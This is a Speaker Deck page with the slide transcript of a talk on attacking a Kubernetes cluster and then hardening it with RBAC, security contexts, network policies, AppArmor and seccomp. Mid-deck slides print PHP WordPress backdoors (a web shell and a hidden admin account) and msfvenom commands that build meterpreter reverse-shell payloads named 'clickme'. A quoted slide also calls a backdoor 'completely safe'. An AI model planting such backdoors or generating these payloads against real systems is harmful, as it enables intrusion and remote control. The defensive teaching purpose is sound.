Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Attacking a K8s cluster and how defending it
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Johann du Toit
October 31, 2019
Technology
0
67
Attacking a K8s cluster and how defending it
Will show how to attack a Kubernetes cluster followed promptly by how to secure your cluster.
Johann du Toit
October 31, 2019
Tweet
Share
More Decks by Johann du Toit
See All by Johann du Toit
RESPECTING THE MICROSERVICE.
johanndutoit
1
77
Why so serious? Using GCP for realtime video context analyzation
johanndutoit
0
83
Progressive Web Apps in 15 Minutes
johanndutoit
0
46
The Machine Learning Intervention
johanndutoit
0
69
Progressive Web Apps
johanndutoit
0
98
Progressive Web Apps
johanndutoit
0
100
Launchpad Start Day 2 - Google Design Sprints
johanndutoit
2
130
Google Design Sprints
johanndutoit
0
94
Cloud Messaging
johanndutoit
0
180
Other Decks in Technology
See All in Technology
スピンアウト講座01_GitHub管理
overflowinc
0
1.5k
TUNA Camp 2026 京都Stage ヒューリスティックアルゴリズム入門
terryu16
0
540
GitHub Copilot CLI で Azure Portal to Bicep
tsubakimoto_s
0
250
Blue/Green Deployment を用いた PostgreSQL のメジャーバージョンアップ
kkato1
0
150
非同期・イベント駆動処理の分散トレーシングの繋げ方
ichikawaken
1
140
SSoT(Single Source of Truth)で「壊して再生」する設計
kawauso
2
370
【AWS】CloudTrail LakeとCloudWatch Logs Insightsの使い分け方針
tsurunosd
0
120
やさしいとこから始めるGitHubリポジトリのセキュリティ
tsubakimoto_s
2
1.8k
【社内勉強会】新年度からコーディングエージェントを使いこなす - 構造と制約で引き出すClaude Codeの実践知
nwiizo
25
13k
Agent Skill 是什麼?對軟體產業帶來的變化
appleboy
0
240
GitHub Actions侵害 — 相次ぐ事例を振り返り、次なる脅威に備える
flatt_security
2
1.7k
QA組織のAI戦略とAIテスト設計システムAITASの実践
sansantech
PRO
1
170
Featured
See All Featured
Reflections from 52 weeks, 52 projects
jeffersonlam
356
21k
Stop Working from a Prison Cell
hatefulcrawdad
274
21k
Money Talks: Using Revenue to Get Sh*t Done
nikkihalliwell
0
190
How to Think Like a Performance Engineer
csswizardry
28
2.5k
Building the Perfect Custom Keyboard
takai
2
720
Making Projects Easy
brettharned
120
6.6k
Mozcon NYC 2025: Stop Losing SEO Traffic
samtorres
0
190
The Impact of AI in SEO - AI Overviews June 2024 Edition
aleyda
5
780
Being A Developer After 40
akosma
91
590k
Jess Joyce - The Pitfalls of Following Frameworks
techseoconnect
PRO
1
120
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
360
30k
Become a Pro
speakerdeck
PRO
31
5.9k
Transcript
Bust a Kube: Let’s attack a Kubernetes cluster and secure
it along the way
None
None
None
None
None
None
WHAT ATTACKING DEFENDING
None
WHAT ATTACKING OMG HELP
None
None
None
PODS NODES SERVICES NAMESPACES
POD Pods are the smallest unit of work in kubernetes
All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume
Node Kubelet Container Runtime: Docker Kube-proxy Kubelet C ontainer Runtim
e pod #1 pod #2 pod #3
Services A service is a load balancer, create a DNS
name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic
Services A service is a load balancer, create a DNS
name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic app=hello tier=web app=hello tier=web
Namespaces Logical grouping of resources and the first hint of
multi-tenancy 10.10.10.2 10.10.10.2 10.10.10.2 10.10.10.2 Marketing Finance
None
> kubectl apply -f app.yaml
None
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
POD Pods are the smallest unit of work in kubernetes
All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume Attacks Tend to Start from a POD
None
None
<?php add_action('wp_head', 'WordPress_bscript'); function WordPress_bscript() { file_put_contents( "exec.php", ‘<?php echo
shell_exec($_REQUEST[“c”]);’ ); } ?>
None
None
<?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')
{ require('wp-includes/registration.php'); If (!username_exists('backdooradmin')) { $user_id = wp_create_user('admin', ‘admin'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>
“Head over to your site and try the function. It’s
fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.”
None
None
None
None
None
None
None
Kali Linux
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f sh \ -o clickme.sh
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f elf \ -o clickme
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f exe \ -o clickme.exe
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f macho \ -o clickme.macho
None
None
None
None
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
CONTROL PLANE NETWORKING HOST RUNTIME
CONTROL PLANE NETWORKING HOST RUNTIME
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
None
None
None
None
None
None
UPGRADE!
None
Role Based Access Control
“RBAC”
None
Role: MarketingAdmin Role: Developer
apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:
- apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer
apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:
- apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer RoleBinding
CONTROL PLANE NETWORKING HOST RUNTIME
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 Step 1: Run as Non Root
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 readOnlyRootFileSystem: true Step 2: Read Only Filesystem
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 readOnlyRootFileSystem: true allowPrivilegeEscalation: false Step 3: Prevent Escaping
CONTROL PLANE NETWORKING HOST RUNTIME
apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: allow-db-access spec: podSelector: matchLabels:
tier: database ingress: - from: - podSelector: matchLabels: frontend policyTypes: - Ingress Network Policy
None
None
None
CONTROL PLANE NETWORKING HOST RUNTIME
None
None
Minimal Host OS
None
AppArmor
seccomp
Questions?
• CIS Benchmark - CIS Security • Kube-bench - Aqua
Security • Kube Auto Analyzer - Rory McCune • KubeAudit - Shopify • Sonobuoy - VMWare / Heptio • KubeATF - Symantec
Security is a not a noun you refer to every
now and then, it’s a verb and involves constant and specific action
Thanks!
[email protected]
@signedness
SiteGround - Reliable hosting with speed, security, and support you can count on.
johanndutoit
overflowinc
terryu16
tsubakimoto_s
kkato1
ichikawaken
kawauso
tsurunosd
nwiizo
appleboy
flatt_security
sansantech
jeffersonlam
hatefulcrawdad
nikkihalliwell
csswizardry
takai
brettharned
samtorres
aleyda
akosma
techseoconnect
bermonpainter
speakerdeck
![<?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')](https://files.speakerdeck.com/presentations/83900f2b77014b15b5401b7e9b99a5c5/slide_29.jpg){kind=link}
![Thanks! [email protected] @signedness](https://files.speakerdeck.com/presentations/83900f2b77014b15b5401b7e9b99a5c5/slide_84.jpg){kind=link}